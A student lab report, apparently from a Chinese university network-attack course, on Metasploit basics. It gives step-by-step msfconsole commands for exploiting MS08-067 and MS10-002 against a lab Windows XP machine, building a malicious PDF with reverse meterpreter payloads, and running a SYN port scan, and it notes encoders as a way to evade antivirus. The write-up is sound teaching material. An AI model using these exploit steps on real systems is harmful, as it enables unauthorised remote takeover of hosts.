20155217《網絡對抗》Exp05 MSF基礎應用
阿新 • • 發佈:2018-04-26
圖片 9.png 生成 alt 掌握 速度 方式 rev 得到
20155217《網絡對抗》Exp05 MSF基礎應用
實踐內容
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
- 一個主動攻擊實踐,如ms08_067;
- 一個針對瀏覽器的攻擊,如ms11_050;
- 一個針對客戶端的攻擊,如Adobe;
- 成功應用任何一個輔助模塊。
主動攻擊:ms08_067
- 先用
search ms08_067
查詢針對該漏洞的攻擊模塊:
- 用
use exploit/windows/smb/ms08_067_netapi
使用該模塊 - 輸入命令
show payloads
會顯示出有效的攻擊載荷:
- 使用命令
set payload generic/shell_reverse_tcp
- 輸入命令
set LHOST 192.168.152.130
,set RHOST 192.168.152.131
- 使用命令
show options
查看payload狀態:
- 輸入命令
exploit
開始攻擊,攻擊成功(若攻擊失敗,則需要關閉XP的防火墻):
- 在kali上執行
ipconfig/all
:
- 在win xp上執行
ipconfig/all
:
- 發現二者結果相同,說明成功攻擊。
對瀏覽器攻擊:MS10-002漏洞攻擊
- 先利用
search ms10_002
指令查看可以運用的攻擊模塊。
- 使用
use windows/browser/ms10_002_aurora
模塊。 - 用
info
- 用
set payload windows/meterpreter/reverse_tcp
設置payload,並設置需要設置的參數。 - 用
show options
確認需要設置的參數是否已經設置好:
- 確認參數設置無誤後,用
exploit
指令開始攻擊,攻擊成功後會有靶機需要訪問的網址:
- 在靶機IE上輸入該網址,此時kali中可以看到有目標主機上線,會話建立。
- 輸入
sessions -i 1
,成功獲取靶機的shell
,可以對其進行操作:
針對客戶端的攻擊:adobe_toolbutton
- 輸入
use exploit/windows/fileformat/adobe_cooltype_sing
- 使用命令
set payload windows/meterpreter/reverse_tcp
設置攻擊有效載荷,並設置相關數據:
- 輸入
exploit
,生成pdf文件
,並可以看到pdf所在文件夾,將pdf復制到靶機裏:
- 使用
use exploit/multi/handler
新建監聽模塊:
- 輸入
sysinfo
,攻擊成功:
成功應用任何一個輔助模塊成功應用任何一個輔助模塊
- 用
show auxiliary
查看所有輔助模塊,並從中選擇一個。我使用的是scanner/portscan/syn
。它是通過發送TCP SYN
標誌的方式來探測開放的端口。 - 用
show options
查看配置,並進行相關配置:
- 配置完成後,
run
,發現掃描開放端口成功:
基礎問題回答
- 用自己的話解釋什麽是exploit,payload,encode。
- exploit是背著payload去攻擊,起到運載作用。
- payload則為攻擊負荷。
- encode為編碼器,使其得到偽裝,防止被查殺,打掩護用到的。
離實戰還缺些什麽技術或步驟?
實戰的話還需要結合靶機的環境去考慮。
實踐總結與體會
這次實驗再次能夠看出msf是一個比較全面的工具,但滲透的局限性也比較明顯。由於前幾天在準備考試,這次實驗完成得比較晚,但在其他同學的幫助下完成速度還是比較快的,畢竟比他們少走了很多彎路。而且這次又從其他角度成功地進行了攻擊,學習到了不少新的東西,美滋滋:D。
20155217《網絡對抗》Exp05 MSF基礎應用